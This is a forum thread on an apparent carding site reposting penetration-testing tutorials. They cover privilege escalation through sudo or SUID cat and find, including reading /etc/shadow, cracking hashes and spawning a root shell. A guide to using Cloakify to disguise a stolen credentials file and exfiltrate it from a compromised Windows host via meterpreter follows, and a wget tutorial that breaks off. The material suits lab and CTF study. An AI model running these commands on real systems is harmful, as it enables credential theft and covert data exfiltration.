+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] Linux for Pentester: CAT Privilege Escalation (/Thread-Guide-Linux-for-Pentester-CAT-Privilege-Escalation)
[Guide] Linux for Pentester: CAT Privilege Escalation - NINZA - 05-14-2020
Today we are going to talk about CAT command and learn how helpful the cat command is for Linux penetration testing and how we’ll progress cat to scale the greater privilege shell.
NOTE: “The main objective of publishing the series of “Linux for pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticizing any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.”
Table of Content
- Introduction to CAT
- Major Functions of CAT command
- Sudo rights Lab setups for Privilege Escalation
- Exploiting Sudo Rights
In Linux, Cat stands for “catenate,” which is one of Unix-like operating system most frequently used commands. It reads file information and displays its content as an output. It enables us to build, view and link files. So, we can not only see the content using CAT command; apart from this we can, copy the content of the file to some other file and view the files with numbers and so on. Not only this we will do such things which is not only new but is what we might have not thought of. We will perform Privilege Escalation using CAT command. That’s sounds interesting. Isn’t it? So, let’s start-
Major Functions of CAT command
At first, we will run cat -h command which means help and which will tell you about all the options which are available in CAT command as we can see in the picture below.
cat --help
1
cat --help
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-CSqFI06T6uc/XQUik6lMsOI/AAAAAAAAe0w/dCJP97VmnxU08R_bIhRsWzMWJNl23lExgCLcBGAs/s1600/1.png?w=687&ssl=1)
Write and Read a file:
Our next step is to create a file using the cat command. And for this, we will use greater than sign (>) after cat command to generate a new file. So, we have created a new file named notes.txt by using (>) this sign after cat command and write the content which you want to keep in the file as in our case I have written “Welcome to Hacking articles” in the file notes.txt
cat > notes.txt
1
cat > notes.txt
Not only this we can also edit the content of the existing file without opening the file by using greater than sign twice (>>) as you can see in the screenshot that we have added “Join Ignite Technologies” in notes.txt
cat >> notes.txt
cat notes.txt
1
2
cat >> notes.txt
cat notes.txt
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-3JaoIC2Vfk4/XQUilrkJ3JI/AAAAAAAAe00/5zBLgT2ZofAi2Wbb2tdJtywSuP6nT5rAgCLcBGAs/s1600/2.png?w=687&ssl=1)
Now we can confirm this by reading the file once again.
cat notes.txt
1
cat notes.txt
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-06tBEQnqfpE/XQUilxFOgBI/AAAAAAAAe04/3a2MmHnRztEAlplEmmhBWMACjBIRKt8FwCLcBGAs/s1600/3.png?w=687&ssl=1)
Number all output lines:
Now let’s say if we want to view file contents preceding line numbers or in other words you want to view the output serialized. So first we will create a new text file named dict.txt in which we have written some content which is going to be easily readable number wise with -n command.
cat dict.txt
cat -n dict.txt
1
2
cat dict.txt
cat -n dict.txt
As a result, this add a serial number column for every line as shown below:
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-eKDuKh2ZMUs/XQUimPGV0MI/AAAAAAAAe08/Gl3mUvR_dEQdByWzP8j7PGEz2SYE0WrWQCLcBGAs/s1600/4.png?w=687&ssl=1)
Overwriting a file
Now we want to copy the content of file dict.txt into notes.txt or in other words we want to overwrite the file notes.txt. So in order to do, this first we write the file name from which the content is to be copied and then we will write the file name whose content we want to replace followed by greater than sign(>).
Syntax: cat [file1] > [file2]
cat dict.txt > notes.txt
1
2
Syntax: cat [file1] > [file2]
cat dict.txt > notes.txt
As you can observe in the picture below that we have replaced the content of notes.txt with dict.txt
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-YerlBTLSPkA/XQUimdmQyiI/AAAAAAAAe1E/2PMY0sWz48Yh8absrnlstAD0pAhmtp9iACLcBGAs/s1600/5.png?w=687&ssl=1)
Concatenating files:
Now we want to merge two files together or in other words, we want to combine two files. So, what will we do? Its again very simple; we will use greater than sigh here but now twice (>>) and the content will be replaced successfully. So here we have another new file which is pass.txt and then we will proceed towards merging two files for which we will use (>>) sign again as we have done in the image below. Now again we will use -n to put this content number wise which we have done above.
cat > pass.txt
cat dict.txt >> pass.txt
cat -n pass.txt
1
2
3
cat > pass.txt
cat dict.txt >> pass.txt
cat -n pass.txt
As result, you can observe that we have concatenate dict.txt in the pass.txt file.
Reverse order
As the name suggests and we can reverse all the content using tac command which is just a reverse of cat command and it works for this purpose only.
cat dict.txt
1
cat dict.txt
With the help of tac command, we try to reverse the file by making a vertical flip as shown below.
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-dueroMB99Ew/XQUim6zaP9I/AAAAAAAAe1I/NsLCWv8I_mgEBK5k4NhO2yXqMdDKQmPywCLcBGAs/s1600/7.png?w=687&ssl=1)
Sudo rights Lab setups for Privilege Escalation
Now here our next step is to set up the lab of Sudo rights or in other words to provide Sudo privileges to a user for cat executable. Here we are going to add a user by the name of the test in the suoders files and here we have given permission to user test to run cat command as root user.
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-ZpBbAJCnnEg/XQUinOu1iZI/AAAAAAAAe1M/LdBQemjOVxEpLkFk172iySp8dZ7VE2sJwCLcBGAs/s1600/8.png?w=687&ssl=1)
Exploiting Sudo Rights
Now we will connect through ssh in kali and after that, we will run sudo -l which is sudo list and through which we can see that user test has the permission to run cat as root user.
ssh [email protected]
1
ssh [email protected]
Now our next step is to exploit sudo rights through cat command. So, we will run cat /etc/shadow command to see all the users and their respective passwords hashes.
sudo -l
sudo cat /etc/shadow
1
2
sudo -l
sudo cat /etc/shadow
Wonderful! We have got all the user’s list and their passwords’ hash value.
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-TNDxsXVn7kY/XQUinaG4qsI/AAAAAAAAe1Q/7cOvqkeCQnk1xQ6bK5U-lwvVdUGR9sQsACLcBGAs/s1600/9.png?w=687&ssl=1)
Cracking the Hash Password
Now our next step is to crack the hash value so that we are going to use “John the Ripper” tool to crack this hash value in order to get the password in decrypted form. So first we have taken one user whose password we want to check. So, run the following command in the terminal-
john hash --show
1
john hash --show
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-f1dcOlYOcHM/XQUikuf5jqI/AAAAAAAAe0o/Y2LxERp11kM5uSTlWrveF6dzH-vKk2-DACLcBGAs/s1600/10.png?w=687&ssl=1)
Great! We have cracked the password successfully. Now we will switch user raj to check if we can log in through that password and we can see that we have successfully logged in as raj user.
Now we will run sudo -l command to check if user raj, and found he has all the root permissions.
sudo -l
sudo su
1
2
sudo -l
sudo su
Now, we will again try to switch to user root and we are logged in as root and then we run id command we get to know that we got a root shell.
So, we have performed privilege escalation through cat command successfully.
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-Oy6bpz_AnAQ/XQUikz-8AfI/AAAAAAAAe0s/KcMty2PeX_MbaJUMgy8lyMCKKtm1THXzgCLcBGAs/s1600/12.png?w=687&ssl=1)
Today in this article we are back with another most advantageous command from the series of Linux for Pentester i.e. “Find’. The Find command is used to search the list of files and directories, so by knowing this fact, we will now illustrate how we can avail it in Privilege Escalation.
NOTE: “The main objective of publishing the series of “Linux for pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticizing any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.”
Table of Content
Introduction to Find
- Major Operation performed using Find
- Sudo Rights Lab setups for Privilege Escalation
- Exploiting Sudo rights
- SUID Lab setups for Privilege Escalation
- Exploiting SUID
Find command is a command line facility for a walk around a file pyramid structure to find the exact location of the file and directory as per the user’s desire. This search command can be used by the variability of services like search any file by “size, permissions, date of modifications/access, users, groups” and many more as per user requisite.
Alike every command the Find also can be concisely understood by its help/man command as per below image.
find --help
1
find --help
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-8jpb9Apf_j0/XQPJ7iOaIOI/AAAAAAAAeyY/jO0U6q0-z-g5iOwi_kM-O4ARzAAuy8WtQCLcBGAs/s1600/1.png?w=687&ssl=1)
Major Operation performed using Find
Search any file by particular name in the current directory: This command supports the user to search any file by a specific name. Suppose we want to search a text file by the name of “raj” from current directory then simply compose the command as per below screenshot.
find . -name raj.txt
1
find . -name raj.txt
Search any file by particular name in the home directory: If we wish to find all the files under home directory by desired file name, in our case it is “raj.txt” then from command as below:
find /home -name raj.txt
1
find /home -name raj.txt
(It will permit the user to find all “raj.txt” file under home directory)
Find files by its extension: This can be returned by specifying the particular file extension. If any user wants to fetch any file by its extension, then it can be done by “-type f” option followed by Find As in our scenario we are fetching for .txt
One can also use the “-type d” option instead of the “-type f” for retrieving the directory.
find / -type f -name "*.txt"
1
find / -type f -name "*.txt"
This command will support the user for printing all .txt file as the desired output.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-gBbHAg3UWNA/XQPJ8ftLz_I/AAAAAAAAeyk/dzVy25XdFRQ5k9Vy8ojTuz8Ec79XFKQPwCLcBGAs/s1600/2.png?w=687&ssl=1)
Find files with full permission: Whenever anybody wishes to explore for the files that have full permission i.e. “777” then it can be simply acquired by “-perm 0777” followed by Find command with the option “-type f” which will print the output for all the files that have“777”
find . -type f -perm 0777 -print
1
find . -type f -perm 0777 -print
To find all files for a specific user of a directory: If we need to find all those files that belong to a particular user under any selective directory then that we can execute this by command as:
find /tmp -user raj
1
find /tmp -user raj
In our instance, we are finding for all those files that belong to user “raj” under “tmp directory”.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-yfb2II72da4/XQPJ8qpNVhI/AAAAAAAAeyo/LSz2PFhETjYwwDuzEPq4lf-vEZXY8QHoQCLcBGAs/s1600/3.png?w=687&ssl=1)
- To find all hidden files: If we want to find all hidden files within any directory then we will type the command as below:
1
find /tmp -type f -name ".*"
This command will give a consequence for all hidden files in the current directory.
To find all readable files within a directory: To find all readable files from a specific directory. In the below screenshot we are discovering for all those files that is in the readable form under /etc directory
find /etc/ -readable -type f 2>/dev/null
1
find /etc/ -readable -type f 2>/dev/null
By typing above command, we will get all readable files that come under /etc as output.
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-hJlLw9XaK-w/XQPJ82YezxI/AAAAAAAAeys/jB0k3pO8SrUQfmd3U3mLxA7rWiMu3jYaQCLcBGAs/s1600/4.png?w=687&ssl=1)
Find SUID files: Whenever any command runs, at which SUID bit is set then its effective UID becomes the owner of that file. So, if we want to find all those files that hold the SUID bit then it can be retrieved by typing the command:
find / -perm -u=s -type f 2>/dev/null
1
find / -perm -u=s -type f 2>/dev/null
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-exWm53IoNk8/XQPJ9SZitUI/AAAAAAAAeyw/eKyRoJK-fLMGx2qzfhmBzyQ7Zlz8j2u9QCLcBGAs/s1600/5.png?w=687&ssl=1)
Find SGID files: The SGID permission is similar as SUID but the only difference is that, whenever any command runs at which SGID permission is set, then the process will have the same group ownership as the owner of the file. So, to run all those files that possess SGID bit, type command:
find / -perm -g=s -type f 2>/dev/null
1
find / -perm -g=s -type f 2>/dev/null
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-Tpl8rslKUuE/XQPJ9tCcfbI/AAAAAAAAey0/USv6jPcXrjItUQmKJkOqcgYMly_YFn_qwCLcBGAs/s1600/6.png?w=687&ssl=1)
To find SUID & SGID files simultaneously: If we want to fetch all those files simultaneously at which both bits i.e. “SUID & SGID” are set then frame command as:
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
1
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-lIc7WCbQMEo/XQPJ9i0-EaI/AAAAAAAAey4/f8B6cnQJ1oAxg-IVt6HQj8CLNCp6vSDnwCLcBGAs/s1600/7.png?w=687&ssl=1)
To find all writable file: To find any writable directories within any desired directory such as: /home, /tmp, /root, then we will run the command as:
find /home -writable -type d 2>/dev/null
1
find /home -writable -type d 2>/dev/null
As per below image we have find all writable directories from /home.
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-Hd4KensjiSo/XQPJ-GDErUI/AAAAAAAAey8/RlgcvQmkh_w5Bz9_u_dokaKhzLvkN3-FACLcBGAs/s1600/8.png?w=687&ssl=1)
Exploiting Find
Sudo Rights Lab setups for Privilege Escalation
Now we will set up our lab of Find command by granting it higher privilege i.e. with administrative rights. As we know the performance of every command gets changed after the influence of higher privileges. Same we will check for our Find command and will grasp what effect it would have after the accomplishment of sudo rights and how we can custom it more in privilege escalation.
To recognize it more visibly first we will create a local user (test) who retain all sudo rights as root.
To add sudo right open /etc/sudoers file and frame below command as user Privilege specification.
test ALL=(root) NOPASSWD: /usr/bin/find
1
test ALL=(root) NOPASSWD: /usr/bin/find
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-y2Vbwxup7AQ/XQPJ-Xm9-vI/AAAAAAAAezA/5QcsdrZD2HYk3YM4sBB7tPcbr8KiHypHQCLcBGAs/s1600/9.png?w=687&ssl=1)
Exploiting Sudo rights
Now we will start exploiting Find service by taking the privilege of sudoer’s permission. For this, we must have a session of the victim’s machine which will enable us to devise the local user access of the targeted system which will support us further to escalate the root user’s rights.
For this we need to connect with the target machine with ssh, so type the command as shown below for performing the same.
ssh [email protected]
1
ssh [email protected]
Then we checked for sudo right of “test” user (if given) and found that user “test” can execute Find command as “root” without a password.
sudo -l
1
sudo -l
Find command let you perform some specific action such as “print, delete and exec”. So here we are taking the privilege of “exec” for executing the command to access root shell by running /bin/bash with the help of find command as given below:
sudo find /home -exec /bin/bash \;
1
sudo find /home -exec /bin/bash \;
On running above command, we have successfully escalated the root shell as shown in the below image.
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-bv8GAn9WOPs/XQPJ7A8eSKI/AAAAAAAAeyQ/QSdsFjpKQ6oUWqwcDCFLB5VjQ_KfHmoAQCLcBGAs/s1600/10.png?w=687&ssl=1)
SUID Lab setups for Privilege Escalation
As we know the SUID bit permission enables the user to execute any files as the ownership of existing file member. Now we are enabling SUID permission on Find so that a local user can take the opportunity of Find as the root user.
Hence type following for enabling SUID bit:
which find
chmod u+s /usr/bin/find
ls -la /usr/bin/find
1
2
3
which find
chmod u+s /usr/bin/find
ls -la /usr/bin/find
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-vaZNm7l7GQE/XQPJ7Sx6HCI/AAAAAAAAeyU/pxoRtytfhPUrnPZ1dC0WN6dvEL6Wlpj8gCLcBGAs/s1600/11.png?w=687&ssl=1)
Exploiting SUID
As we know we have access to victim’s machine so we will use Find command to identify binaries having SUID permission.
find / -perm -u=s -type f 2>/dev/null
1
find / -perm -u=s -type f 2>/dev/null
So here we came to recognize that SUID bit is empowered for so many binary files, but our concerned is: /usr/bin/find.
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-6b5bzVaYwDM/XQPJ8OLmgWI/AAAAAAAAeyc/J6wqIV-sGNo3rKrZ3SkBNllxgSLc5Sa6ACLcBGAs/s1600/12.png?w=687&ssl=1)
As we know Find command supports the user to perform some specific action such as print, delete and exec. So here again we are taking the privilege of “exec” for executing another command i.e. “whoami”
find raj -exec "whoami" \;
1
find raj -exec "whoami" \;
Similarly, you can take honour of Find command for escalating the root privileges.
![[Image: 13.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-7IhAKER3irA/XQPJ8OEj0WI/AAAAAAAAeyg/92sG3-P9xMESv2x8YtWxaYnVbOCZGbKtQCLcBGAs/s1600/13.png?w=687&ssl=1)
In our previous post, we had already discussed on “Cloud Storage Uploads for data exfiltration” and today we are going to discussed “Concealed Method for Data Exfiltration” to extract the unauthorized data. Here you will learn how an intruder can exfiltrate data through steganography approach.
Table of Content
- Overview
- About Data Exfiltration
- Cloakify Installation and Usages (for Linux)
- Method -I
- Method II
- Cloakify Installation and Usages (for Windows)
We will perform red team practice, where we will attempt to collect the important files from the victim’s machine by inducing steganography with the help of concealed methods. When copying information from the destination machine, we will try to transform the data to befool the network monitors so that they can not identify the data packet travelling in the network.
All this could be performed by using a single tool named “Cloakify Factory”.
Cloakify Factory transforms any filetype (e.g .zip, .exe, .xls,etc.) into a list of harmless-looking string. This lets you hide the file in plain sight and transfer the file without triggering alerts. The fancy terms for this “text-based steganography”, hiding data by making it look like other data. Cloaked files defeat signature-based malware detection tools.
About Data Exfiltration
Data exfiltration occurs when malware and/or a malicious actor carries out an unauthorized data transfer from a computer. It is also commonly called data extrusion or data exportation. Data exfiltration is also considered a form of data theft. During the past couple of decades, a number of data exfiltration efforts severely damaged the consumer confidence, corporate valuation, and intellectual property of businesses and national security of governments across the world.
![[Image: 0.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-t9LB_yAbXJQ/XQEcMGMMMNI/AAAAAAAAewg/BebuQLp2sCYanbAs3fPpiM7SpYt6vW-iQCLcBGAs/s1600/0.png?w=687&ssl=1)
Methods of Data Exfiltration
Open Methods:
- HTTP/HTTPS Downloads & Uploads
- FTP
- Email
- Instant Messaging
- P2P filesharing
- SSH
- VPN
- Protocol Tunneling
[To see content please register here]
- Steganography
- Timing channel
[To see content please register here]
)Cloakify Installation & Usages (for Linux)
CloakifyFactory – Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into a list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting Controls, Social Engineering of Analysts, Evade AV Detection.
Only you need to type following for downloading the cloakify from GitHub in the target machine.
git clone
[To see content please register here]
cd Cloakify.pychmod -R 777 noiseTools
1
2
3
git clone
[To see content please register here]
cd Cloakify.pychmod -R 777 noiseTools
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-PTxgzpHaRgw/XQEcMKTVCBI/AAAAAAAAewo/2tjpyr-Rz3Qzv6czKxhX618AiTQUM4saACLcBGAs/s1600/1.png?w=687&ssl=1)
Let’s run the python script to lunch cloakifyfactory.py
python cloakifyFactory.py
1
python cloakifyFactory.py
CloakifyFactory is a menu-driven tool that leverages Cloakify Toolset scripts. When you choose to Cloakify a file, the scripts first Base64-encode the payload, then apply a cipher to generate a list of strings that encodes the Base64 payload. You then transfer the file however you wish to its desired destination. Once exfiltrated, choose Decloakify with the same cipher to decode the payload.
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-j25FX5TWnWU/XQEcPYXLvoI/AAAAAAAAexQ/CRbMUDhn_iofQEgWtTo-_ycWjAA8ynhRQCLcBGAs/s1600/2.png?w=687&ssl=1)
Let’s take an example now that we want to copy a text file “pwd.txt” from within the target system containing the login credentials of different machines in the network.
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-ub4HDP4wbQk/XQEcQAyp7XI/AAAAAAAAexY/9_PN53Czav4JCIk6ggz5I3TkXdjkyANTgCLcBGAs/s1600/3.png?w=687&ssl=1)
Method -I
It may be dangerous to copy the text file directly, so we will transform the input file data into another file as output. To do so follow the below steps:
- Run the python script to launch cloakifyfactory.py
- Press 1 to select cloakify a file option
- Enter the path of the source file that you want to transform an the input file.
- Enter the path of the destination file to where you want to save the output.
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-k3skI-ilw6M/XQEcQRSTbPI/AAAAAAAAexc/fD3wWu3VM_ou8UJsJPKFDm5F01qnVXoIgCLcBGAs/s1600/4.png?w=687&ssl=1)
Further, you will get a list of ciphers, choose the desired option for encrypting the file. Suppose I want the whole content to get changed into facial emojis.
- Press 3 for emoji cipher
- Allow to Add noise to cloaked file by pressing Y for yes.
- Then press 1 to select prependemoji.py as a noise generator.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-svev0YWoP4w/XQEcQaARLOI/AAAAAAAAexg/CIYZdVR_-OsGsOlmVlW6ioMn_C1GNuiTQCLcBGAs/s1600/5.png?w=687&ssl=1)
As result, you will get the output content something like shown in the below image.
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-zsI1RVYEf1I/XQEcQ6yVigI/AAAAAAAAexk/c9jXhFaQwh8yGR1U0ec42S8M5fhNKhv_wCLcBGAs/s1600/6.png?w=687&ssl=1)
Now if you want to obtain the output result in its original format, then you can go with the decloakify option which will revert the transformation into its original existence, but before that, you have to give all permissions to removeNoise.py
chmod 777 removeNoise.py
1
chmod 777 removeNoise.py
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-R942Ewlp6Co/XQEcRYgfCKI/AAAAAAAAexo/a_8ymuQhwggpCYOlrTgnbMG8DQWHTOglwCLcBGAs/s1600/7.png?w=687&ssl=1)
To do so follow the below steps:
- Run the python script to launch cloakifyfactory.py
- Press 2 to select decloakify a file option
- Enter the path of the file that you want to restore back into its original format.
- Enter the path of the file to where you want to save the output.
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-b2zlgH2wrFk/XQEcRmPdRuI/AAAAAAAAexs/oEd9NSKvffgc6pBXR1nFfX4akcXkGWlDACLcBGAs/s1600/8.png?w=687&ssl=1)
Press Y to answer yes because we have added noise to cloaked file and select noise generator.
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-IqFIQUxtNaY/XQEcR7rMNJI/AAAAAAAAexw/bP5BHjEBK1MCRsM8318eJrtUfbbcSGZPACLcBGAs/s1600/9.png?w=687&ssl=1)
Method II
Again, we have a similar file that we want to cloaked into another format directly without operating the cloakifyfactory console.
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-957AezT2Olc/XQEcMPuLBZI/AAAAAAAAewk/coAWGfvSreQcofpuQnp4xpEfZTVV9MQEQCLcBGAs/s1600/10.png?w=687&ssl=1)
This time you can use a single command to cloak the file by adding specify the type of cipher as given below:
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-JvvBH8agtiE/XQEcM2qXCGI/AAAAAAAAews/pTk7U3bncTEHbjbCmtHoQAPKD5oIA22FQCLcBGAs/s1600/11.png?w=687&ssl=1)
python cloakify.py /root/Desktop/pwd.txt ciphers/starTrek
1
python cloakify.py /root/Desktop/pwd.txt ciphers/starTrek
After executing the above command, we can observe the output result would be something like this as shown in the below image.
So we have used the file.txt file as destination file to save the transformed information inside it without printing the output result on the screen. Moreover, further, we have used decloak command to revert the transformed file back into its original state.
python cloakify.py /root/Desktop/pwd.txt ciphers/starTrek > /root/Desktop/file.txt
python decloakify.py /root/Desktop/pwd.txt ciphers/starTrek
1
2
python cloakify.py /root/Desktop/pwd.txt ciphers/starTrek > /root/Desktop/file.txt
python decloakify.py /root/Desktop/pwd.txt ciphers/starTrek
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-fgSz0L83S9U/XQEcNFqVhxI/AAAAAAAAeww/MXq8o2Quxh0jJ6kPyiUXF5mreuuFq9N0wCLcBGAs/s1600/12.png?w=687&ssl=1)
Cloakify Installation and Usages (For Windows)
As we all know this is an exfiltration tool and data could be exfiltrate from any platform either from Linux or Windows based OS, therefore cloakifyfactory has built the application both platforms. In the 1st phase, we have use python-based application for Linux machine and now remotely we are going to deploy cloakify factory inside Windows machine using MSI package of python for our python based application.
Thus, we downloaded the MSI package in our local machine (Kali Linux):
wget
[To see content please register here]
1
wget
[To see content please register here]
![[Image: 13.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-rLlDazgSWDw/XQEcNf6HZBI/AAAAAAAAew0/m9lAKZIj5yI1dgW21prxjuSjvD7SYGsVQCLcBGAs/s1600/13.png?w=687&ssl=1)
Now our purpose is to show how an intruder can remotely exfiltrate the data using cloakifyfactory. So, we had compromised the system first and got the meterpreter session and then uploaded the MSI package inside the victim’s machine to install the dependency required for python.
upload python-2.7.msi .
shell
msiexec /i python-2.7.msi /qn
1
2
3
upload python-2.7.msi .
shell
msiexec /i python-2.7.msi /qn
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-m99COLDKzFk/XQEcNuf-YFI/AAAAAAAAew4/rVXISXhOq18qO5OU6JaxNLD8-4we6a6HwCLcBGAs/s1600/14.png?w=687&ssl=1)
Now download the zip file for cloakifyfactory from GitHub in your local machine.
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-d5_OSY9wFQo/XQEcN5AZXiI/AAAAAAAAew8/K5vQQpUBBRUZtthzM8u0PRpsmD-SI6lnQCLcBGAs/s1600/15.png?w=687&ssl=1)
We also need to download 7-zip exe program for extracting the cloakify-master.zip.
![[Image: 16.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-xkd8EZukUIY/XQEcOccwdfI/AAAAAAAAexA/FzWl1kFX3Z0Z43J0RCYkmpAUHo87LWUYQCLcBGAs/s1600/16.png?w=687&ssl=1)
Now extract the 7za920.zip and you will get the 7za.exe file that we have to inject in the victim’s machine.
![[Image: 17.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-2XjJ-qVBvSg/XQEcOVh0rlI/AAAAAAAAexE/7_2U_JeJ_tUCLpEi6QDjEB18a6JVMKDLwCLcBGAs/s1600/17.png?w=687&ssl=1)
Now let’s upload 7za.exe and cloakfy-master.zip in the remote system. And further, use the 7za.exe program to unzip the cloakify-master.zip.
Therefore, execute the following command:
upload /root/Downloads/Cloakify-master.zip .
upload /root/Downloads/7za.exe
shell
7za.exe x cloakify-master.zip
1
2
3
4
upload /root/Downloads/Cloakify-master.zip .
upload /root/Downloads/7za.exe
shell
7za.exe x cloakify-master.zip
![[Image: 18.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-f331_4VtDXc/XQEcOiDxeEI/AAAAAAAAexI/_Dsk-w6D090-Zz3KZM8uEa_FBOjV23gpgCLcBGAs/s1600/18.png?w=687&ssl=1)
Now we want to transfer the secret.txt file of the compromised machine but directly copying the file might generate the alert, therefore, we will transform the data as done above.
![[Image: 19.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-arWbP1lKeWk/XQEcPATD0nI/AAAAAAAAexM/HR9XWu_hReo-6ABlRPlBXhQcErK9MafkQCLcBGAs/s1600/19.png?w=687&ssl=1)
Now again we try to covert the content of the secret.txt file by hiding it behind the cloaked file. And it is very simple as performed earlier with little modification. So now we can run the cloakify.py file with the help of python.
C:\Python27\python.exe cloakify.py C:\Users\raj\Desktop\secret.txt ciphers\pokemonGo > dump.txt
type dump.txt
1
2
C:\Python27\python.exe cloakify.py C:\Users\raj\Desktop\secret.txt ciphers\pokemonGo > dump.txt
type dump.txt
Thus, we can observe that with the help of cloakify we have transformed the filetype cannot be detected easily.
Conclusion: cloakify-factory could be very useful for exfiltrating data internally as we saw it has many cipher script that used to the cloaked data file and hence it is a very effective tool for performing text-based steganography.
![[Image: 20.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-U_S9eascyrU/XQEcPgq2VsI/AAAAAAAAexU/bwsfcejglYkfPcTJBGK-jyyzQtKKd_yewCLcBGAs/s1600/20.png?w=687&ssl=1)
In this article, we are going to describe the entire utility of Wget command and how vital it is in Linux penetration testing. As Wget is used for downloading the files from the server so here we will learn that what else we can do by this command in Privilege Escalation.
NOTE: “The main objective of publishing the series of “Linux for pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticizing any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.”
Table of Content
Introduction to Wget
- Major Operation performed using Wget
- Sudo Rights Lab setups for Privilege Escalation
- Exploiting Sudo rights
- SUID Lab setups for Privilege Escalation
- Exploiting SUID
The Wget command is a command line utility that enables the user to download single or multiple files simultaneously from internet or server by the help of many protocols like HTTP, HTTPS and FTP. This command performs many operations that can be used by any user while downloading any file from the internet such as: Downloading multiple files, downloading in the background, resuming downloading, renaming any downloaded file, Mirror downloading.
The more functionality of this command can be briefly understood by using its help command. Here we are using -h argument for this function. As we can see by the below image which showing list of many arguments that can be used with Wget command while executing it. For viewing as below image, we will simply type the command on our Linux screenshot as showing below:
wget -h
1
wget -h
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-UWRcRwgsc2Q/XP5rTWCoOII/AAAAAAAAevE/iEB1iKxaHd8zY9pm48xY1oDF3kJ9uxjcQCLcBGAs/s1600/1.png?w=687&ssl=1)
Major Operation performed using Wget
To download a file: Wget command provides assistance to their user for downloading any file/webpage in both platforms i.e. in front of the current processing screen and also in the background. Here I’m downloading putty.exe file in this article to show the overall working process of Wget command. Type below command to download a single file which use the simple syntax: Wget (option) URL
wget
[To see content please register here]
1
wget
[To see content please register here]
To download a file in background: As we know Wget is a non-interactive downloader that allows the user to download the file in the background too without creating any hassle with the current process.
Here I’m using -b argument for this task following by the whole command as mentioned below.
wget -b
[To see content please register here]
1
wget -b
[To see content please register here]
